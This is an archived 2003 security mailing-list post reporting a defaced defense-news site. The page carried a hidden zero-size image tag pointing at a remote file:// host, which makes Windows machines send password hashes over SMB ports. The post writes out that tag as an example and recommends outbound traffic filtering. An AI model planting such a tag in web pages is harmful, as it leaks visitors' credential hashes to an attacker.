For the third time since May 5th, a site which provides news about department of defense issues has apparently been defaced. The hack is described in Ed Skoudis's excellent book entitled "Counter Hack" (pages 289-290). The hack we noticed today is a web page with content of the form <img src=file://korean_ip_address/test.jpg height=0 width=0> If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows hosts will attempt to send password hashes to the remote host. Hosts may attempt to contact the remote host on other ports (e.g. 80) as well. This clearly illustrates the importance of outbound traffic filtering. Vern Stark, GCIA, GSEC JHU/APL ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Fri Jul 18 2003 - 11:14:35 PDT